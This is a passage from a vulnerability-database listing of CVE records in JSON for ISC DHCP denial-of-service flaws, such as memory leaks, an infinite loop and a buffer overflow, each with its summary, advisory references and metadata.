"name": "https://blogs.oracle.com/sunsecurity/entry/cve_2012_3955_denial_of",
"refsource": "CONFIRM",
"url": "https://blogs.oracle.com/sunsecurity/entry/cve_2012_3955_denial_of"
},
{
"name": "openSUSE-SU-2012:1254",
"refsource": "SUSE",
"url": "http://lists.opensuse.org/opensuse-updates/2012-09/msg00105.html"
},
{
"name": "GLSA-201301-06",
"refsource": "GENTOO",
"url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
},
{
"name": "https://kb.isc.org/article/AA-00779",
"refsource": "CONFIRM",
"url": "https://kb.isc.org/article/AA-00779"
},
{
"name": "1027528",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id?1027528"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2012-3955",
"datePublished": "2012-09-14T10:00:00.000Z",
"dateReserved": "2012-07-11T00:00:00.000Z",
"dateUpdated": "2024-08-06T20:21:04.060Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2012-3954 (GCVE-0-2012-3954)
Vulnerability from nvd – Published: 2012-07-25 10:00 – Updated: 2024-08-06 20:21
VLAI?
Summary
Multiple memory leaks in ISC DHCP 4.1.x and 4.2.x before 4.2.4-P1 and 4.1-ESV before 4.1-ESV-R6 allow remote attackers to cause a denial of service (memory consumption) by sending many requests.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||
Date Public ?
2012-07-24 00:00
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T20:21:04.079Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "1027300",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id?1027300"
},
{
"name": "DSA-2516",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN",
"x_transferred"
],
"url": "http://www.debian.org/security/2012/dsa-2516"
},
{
"name": "RHSA-2012:1141",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "http://rhn.redhat.com/errata/RHSA-2012-1141.html"
},
{
"name": "MDVSA-2012:116",
"tags": [
"vendor-advisory",
"x_refsource_MANDRIVA",
"x_transferred"
],
"url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:116"
},
{
"name": "openSUSE-SU-2012:1006",
"tags": [
"vendor-advisory",
"x_refsource_SUSE",
"x_transferred"
],
"url": "http://lists.opensuse.org/opensuse-updates/2012-08/msg00030.html"
},
{
"name": "MDVSA-2012:115",
"tags": [
"vendor-advisory",
"x_refsource_MANDRIVA",
"x_transferred"
],
"url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:115"
},
{
"name": "DSA-2519",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN",
"x_transferred"
],
"url": "http://www.debian.org/security/2012/dsa-2519"
},
{
"name": "USN-1519-1",
"tags": [
"vendor-advisory",
"x_refsource_UBUNTU",
"x_transferred"
],
"url": "http://www.ubuntu.com/usn/USN-1519-1"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.isc.org/article/AA-00737"
},
{
"name": "GLSA-201301-06",
"tags": [
"vendor-advisory",
"x_refsource_GENTOO",
"x_transferred"
],
"url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
},
{
"name": "54665",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/54665"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2012-07-24T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "Multiple memory leaks in ISC DHCP 4.1.x and 4.2.x before 4.2.4-P1 and 4.1-ESV before 4.1-ESV-R6 allow remote attackers to cause a denial of service (memory consumption) by sending many requests."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2016-11-25T19:57:01.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "1027300",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id?1027300"
},
{
"name": "DSA-2516",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN"
],
"url": "http://www.debian.org/security/2012/dsa-2516"
},
{
"name": "RHSA-2012:1141",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "http://rhn.redhat.com/errata/RHSA-2012-1141.html"
},
{
"name": "MDVSA-2012:116",
"tags": [
"vendor-advisory",
"x_refsource_MANDRIVA"
],
"url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:116"
},
{
"name": "openSUSE-SU-2012:1006",
"tags": [
"vendor-advisory",
"x_refsource_SUSE"
],
"url": "http://lists.opensuse.org/opensuse-updates/2012-08/msg00030.html"
},
{
"name": "MDVSA-2012:115",
"tags": [
"vendor-advisory",
"x_refsource_MANDRIVA"
],
"url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:115"
},
{
"name": "DSA-2519",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN"
],
"url": "http://www.debian.org/security/2012/dsa-2519"
},
{
"name": "USN-1519-1",
"tags": [
"vendor-advisory",
"x_refsource_UBUNTU"
],
"url": "http://www.ubuntu.com/usn/USN-1519-1"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.isc.org/article/AA-00737"
},
{
"name": "GLSA-201301-06",
"tags": [
"vendor-advisory",
"x_refsource_GENTOO"
],
"url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
},
{
"name": "54665",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/54665"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2012-3954",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Multiple memory leaks in ISC DHCP 4.1.x and 4.2.x before 4.2.4-P1 and 4.1-ESV before 4.1-ESV-R6 allow remote attackers to cause a denial of service (memory consumption) by sending many requests."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "1027300",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id?1027300"
},
{
"name": "DSA-2516",
"refsource": "DEBIAN",
"url": "http://www.debian.org/security/2012/dsa-2516"
},
{
"name": "RHSA-2012:1141",
"refsource": "REDHAT",
"url": "http://rhn.redhat.com/errata/RHSA-2012-1141.html"
},
{
"name": "MDVSA-2012:116",
"refsource": "MANDRIVA",
"url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:116"
},
{
"name": "openSUSE-SU-2012:1006",
"refsource": "SUSE",
"url": "http://lists.opensuse.org/opensuse-updates/2012-08/msg00030.html"
},
{
"name": "MDVSA-2012:115",
"refsource": "MANDRIVA",
"url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:115"
},
{
"name": "DSA-2519",
"refsource": "DEBIAN",
"url": "http://www.debian.org/security/2012/dsa-2519"
},
{
"name": "USN-1519-1",
"refsource": "UBUNTU",
"url": "http://www.ubuntu.com/usn/USN-1519-1"
},
{
"name": "https://kb.isc.org/article/AA-00737",
"refsource": "CONFIRM",
"url": "https://kb.isc.org/article/AA-00737"
},
{
"name": "GLSA-201301-06",
"refsource": "GENTOO",
"url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
},
{
"name": "54665",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/54665"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2012-3954",
"datePublished": "2012-07-25T10:00:00.000Z",
"dateReserved": "2012-07-11T00:00:00.000Z",
"dateUpdated": "2024-08-06T20:21:04.079Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2012-3571 (GCVE-0-2012-3571)
Vulnerability from nvd – Published: 2012-07-25 10:00 – Updated: 2024-08-06 20:13
VLAI?
Summary
ISC DHCP 4.1.2 through 4.2.4 and 4.1-ESV before 4.1-ESV-R6 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a malformed client identifier.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||
Date Public ?
2012-07-24 00:00
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T20:13:51.326Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.isc.org/article/AA-00712"
},
{
"name": "DSA-2516",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN",
"x_transferred"
],
"url": "http://www.debian.org/security/2012/dsa-2516"
},
{
"name": "RHSA-2012:1141",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "http://rhn.redhat.com/errata/RHSA-2012-1141.html"
},
{
"name": "MDVSA-2012:116",
"tags": [
"vendor-advisory",
"x_refsource_MANDRIVA",
"x_transferred"
],
"url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:116"
},
{
"name": "openSUSE-SU-2012:1006",
"tags": [
"vendor-advisory",
"x_refsource_SUSE",
"x_transferred"
],
"url": "http://lists.opensuse.org/opensuse-updates/2012-08/msg00030.html"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://kb.juniper.net/InfoCenter/index?page=content\u0026id=JSA10761"
},
{
"name": "MDVSA-2012:115",
"tags": [
"vendor-advisory",
"x_refsource_MANDRIVA",
"x_transferred"
],
"url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:115"
},
{
"name": "DSA-2519",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN",
"x_transferred"
],
"url": "http://www.debian.org/security/2012/dsa-2519"
},
{
"name": "USN-1519-1",
"tags": [
"vendor-advisory",
"x_refsource_UBUNTU",
"x_transferred"
],
"url": "http://www.ubuntu.com/usn/USN-1519-1"
},
{
"name": "GLSA-201301-06",
"tags": [
"vendor-advisory",
"x_refsource_GENTOO",
"x_transferred"
],
"url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
},
{
"name": "RHSA-2012:1140",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "http://rhn.redhat.com/errata/RHSA-2012-1140.html"
},
{
"name": "54665",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/54665"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2012-07-24T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "ISC DHCP 4.1.2 through 4.2.4 and 4.1-ESV before 4.1-ESV-R6 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a malformed client identifier."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2016-12-29T21:57:01.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.isc.org/article/AA-00712"
},
{
"name": "DSA-2516",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN"
],
"url": "http://www.debian.org/security/2012/dsa-2516"
},
{
"name": "RHSA-2012:1141",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "http://rhn.redhat.com/errata/RHSA-2012-1141.html"
},
{
"name": "MDVSA-2012:116",
"tags": [
"vendor-advisory",
"x_refsource_MANDRIVA"
],
"url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:116"
},
{
"name": "openSUSE-SU-2012:1006",
"tags": [
"vendor-advisory",
"x_refsource_SUSE"
],
"url": "http://lists.opensuse.org/opensuse-updates/2012-08/msg00030.html"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://kb.juniper.net/InfoCenter/index?page=content\u0026id=JSA10761"
},
{
"name": "MDVSA-2012:115",
"tags": [
"vendor-advisory",
"x_refsource_MANDRIVA"
],
"url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:115"
},
{
"name": "DSA-2519",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN"
],
"url": "http://www.debian.org/security/2012/dsa-2519"
},
{
"name": "USN-1519-1",
"tags": [
"vendor-advisory",
"x_refsource_UBUNTU"
],
"url": "http://www.ubuntu.com/usn/USN-1519-1"
},
{
"name": "GLSA-201301-06",
"tags": [
"vendor-advisory",
"x_refsource_GENTOO"
],
"url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
},
{
"name": "RHSA-2012:1140",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "http://rhn.redhat.com/errata/RHSA-2012-1140.html"
},
{
"name": "54665",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/54665"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2012-3571",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "ISC DHCP 4.1.2 through 4.2.4 and 4.1-ESV before 4.1-ESV-R6 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a malformed client identifier."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html",
"refsource": "CONFIRM",
"url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html"
},
{
"name": "https://kb.isc.org/article/AA-00712",
"refsource": "CONFIRM",
"url": "https://kb.isc.org/article/AA-00712"
},
{
"name": "DSA-2516",
"refsource": "DEBIAN",
"url": "http://www.debian.org/security/2012/dsa-2516"
},
{
"name": "RHSA-2012:1141",
"refsource": "REDHAT",
"url": "http://rhn.redhat.com/errata/RHSA-2012-1141.html"
},
{
"name": "MDVSA-2012:116",
"refsource": "MANDRIVA",
"url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:116"
},
{
"name": "openSUSE-SU-2012:1006",
"refsource": "SUSE",
"url": "http://lists.opensuse.org/opensuse-updates/2012-08/msg00030.html"
},
{
"name": "http://kb.juniper.net/InfoCenter/index?page=content\u0026id=JSA10761",
"refsource": "CONFIRM",
"url": "http://kb.juniper.net/InfoCenter/index?page=content\u0026id=JSA10761"
},
{
"name": "MDVSA-2012:115",
"refsource": "MANDRIVA",
"url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:115"
},
{
"name": "DSA-2519",
"refsource": "DEBIAN",
"url": "http://www.debian.org/security/2012/dsa-2519"
},
{
"name": "USN-1519-1",
"refsource": "UBUNTU",
"url": "http://www.ubuntu.com/usn/USN-1519-1"
},
{
"name": "GLSA-201301-06",
"refsource": "GENTOO",
"url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
},
{
"name": "RHSA-2012:1140",
"refsource": "REDHAT",
"url": "http://rhn.redhat.com/errata/RHSA-2012-1140.html"
},
{
"name": "54665",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/54665"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2012-3571",
"datePublished": "2012-07-25T10:00:00.000Z",
"dateReserved": "2012-06-14T00:00:00.000Z",
"dateUpdated": "2024-08-06T20:13:51.326Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2012-3570 (GCVE-0-2012-3570)
Vulnerability from nvd – Published: 2012-07-25 10:00 – Updated: 2024-08-06 20:13
VLAI?
Summary
Buffer overflow in ISC DHCP 4.2.x before 4.2.4-P1, when DHCPv6 mode is enabled, allows remote attackers to cause a denial of service (segmentation fault and daemon exit) via a crafted client identifier parameter.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
Date Public ?
2012-07-24 00:00
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T20:13:50.567Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "openSUSE-SU-2012:1006",
"tags": [
"vendor-advisory",
"x_refsource_SUSE",
"x_transferred"
],
"url": "http://lists.opensuse.org/opensuse-updates/2012-08/msg00030.html"
},
{
"name": "MDVSA-2012:115",
"tags": [
"vendor-advisory",
"x_refsource_MANDRIVA",
"x_transferred"
],
"url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:115"
},
{
"name": "GLSA-201301-06",
"tags": [
"vendor-advisory",
"x_refsource_GENTOO",
"x_transferred"
],
"url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.isc.org/article/AA-00714"
},
{
"name": "54665",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/54665"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2012-07-24T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "Buffer overflow in ISC DHCP 4.2.x before 4.2.4-P1, when DHCPv6 mode is enabled, allows remote attackers to cause a denial of service (segmentation fault and daemon exit) via a crafted client identifier parameter."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2016-11-25T19:57:01.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "openSUSE-SU-2012:1006",
"tags": [
"vendor-advisory",
"x_refsource_SUSE"
],
"url": "http://lists.opensuse.org/opensuse-updates/2012-08/msg00030.html"
},
{
"name": "MDVSA-2012:115",
"tags": [
"vendor-advisory",
"x_refsource_MANDRIVA"
],
"url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:115"
},
{
"name": "GLSA-201301-06",
"tags": [
"vendor-advisory",
"x_refsource_GENTOO"
],
"url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.isc.org/article/AA-00714"
},
{
"name": "54665",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/54665"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2012-3570",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Buffer overflow in ISC DHCP 4.2.x before 4.2.4-P1, when DHCPv6 mode is enabled, allows remote attackers to cause a denial of service (segmentation fault and daemon exit) via a crafted client identifier parameter."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "openSUSE-SU-2012:1006",
"refsource": "SUSE",
"url": "http://lists.opensuse.org/opensuse-updates/2012-08/msg00030.html"
},
{
"name": "MDVSA-2012:115",
"refsource": "MANDRIVA",
"url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:115"
},
{
"name": "GLSA-201301-06",
"refsource": "GENTOO",
"url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
},
{
"name": "https://kb.isc.org/article/AA-00714",
"refsource": "CONFIRM",
"url": "https://kb.isc.org/article/AA-00714"
},
{
"name": "54665",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/54665"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2012-3570",
"datePublished": "2012-07-25T10:00:00.000Z",
"dateReserved": "2012-06-14T00:00:00.000Z",
"dateUpdated": "2024-08-06T20:13:50.567Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2011-4868 (GCVE-0-2011-4868)
Vulnerability from nvd – Published: 2012-01-15 02:00 – Updated: 2024-08-07 00:16
VLAI?
Summary
The logging functionality in dhcpd in ISC DHCP before 4.2.3-P2, when using Dynamic DNS (DDNS) and issuing IPv6 addresses, does not properly handle the DHCPv6 lease structure, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via crafted packets related to a lease-status update.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
Date Public ?
2012-01-12 00:00
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T00:16:35.122Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.isc.org/article/AA-00705"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://www.isc.org/software/dhcp/advisories/cve-2011-4868"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://deepthought.isc.org/article/AA-00595"
},
{
"name": "GLSA-201301-06",
"tags": [
"vendor-advisory",
"x_refsource_GENTOO",
"x_transferred"
],
"url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2012-01-12T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "The logging functionality in dhcpd in ISC DHCP before 4.2.3-P2, when using Dynamic DNS (DDNS) and issuing IPv6 addresses, does not properly handle the DHCPv6 lease structure, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via crafted packets related to a lease-status update."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2016-11-30T20:57:01.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.isc.org/article/AA-00705"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://www.isc.org/software/dhcp/advisories/cve-2011-4868"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://deepthought.isc.org/article/AA-00595"
},
{
"name": "GLSA-201301-06",
"tags": [
"vendor-advisory",
"x_refsource_GENTOO"
],
"url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2011-4868",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The logging functionality in dhcpd in ISC DHCP before 4.2.3-P2, when using Dynamic DNS (DDNS) and issuing IPv6 addresses, does not properly handle the DHCPv6 lease structure, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via crafted packets related to a lease-status update."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.isc.org/article/AA-00705",
"refsource": "CONFIRM",
"url": "https://kb.isc.org/article/AA-00705"
},
{
"name": "https://www.isc.org/software/dhcp/advisories/cve-2011-4868",
"refsource": "CONFIRM",
"url": "https://www.isc.org/software/dhcp/advisories/cve-2011-4868"
},
{
"name": "https://deepthought.isc.org/article/AA-00595",
"refsource": "CONFIRM",
"url": "https://deepthought.isc.org/article/AA-00595"
},
{
"name": "GLSA-201301-06",
"refsource": "GENTOO",
"url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2011-4868",
"datePublished": "2012-01-15T02:00:00.000Z",
"dateReserved": "2011-12-19T00:00:00.000Z",
"dateUpdated": "2024-08-07T00:16:35.122Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-2929 (GCVE-0-2022-2929)
Vulnerability from cvelistv5 – Published: 2022-10-07 04:45 – Updated: 2024-09-16 18:28
VLAI?
Title
DHCP memory leak
Summary
In ISC DHCP 1.0 -> 4.4.3, ISC DHCP 4.1-ESV-R1 -> 4.1-ESV-R16-P1 a system with access to a DHCP server, sending DHCP packets crafted to include fqdn labels longer than 63 bytes, could eventually cause the server to run out of memory.
Severity ?
6.5 (Medium)
CWE
- The function fqdn_universe_decode() allocates buffer space for the contents of option 81 (fqdn) data received in a DHCP packet. The maximum length of a DNS label is 63 bytes. The function tests the length byte of each label contained in the fqdn; if it finds a label whose length byte value is larger than 63, it returns without dereferencing the buffer space. This will cause a memory leak. Affects In ISC DHCP 1.0 -> 4.4.3, ISC DHCP 4.1-ESV-R1 -> 4.1-ESV-R16-P1
Assigner
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
Date Public ?
2022-10-05 00:00
Credits
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T00:52:59.819Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://kb.isc.org/docs/cve-2022-2929"
},
{
"name": "[debian-lts-announce] 20221010 [SECURITY] [DLA 3146-1] isc-dhcp security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00015.html"
},
{
"name": "FEDORA-2022-f5a45757df",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QQXYCIWUDILRCNBAIMVFCSGXBRKEPB4K/"
},
{
"name": "FEDORA-2022-9ca9a94e28",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/T6IBFH4MRRNJQVWEKILQ6I6CXWW766FX/"
},
{
"name": "FEDORA-2022-c4f274a54f",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2SARIK7KZ7MGQIWDRWZFAOSQSPXY4GOU/"
},
{
"name": "GLSA-202305-22",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://security.gentoo.org/glsa/202305-22"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "ISC DHCP",
"vendor": "ISC",
"versions": [
{
"status": "affected",
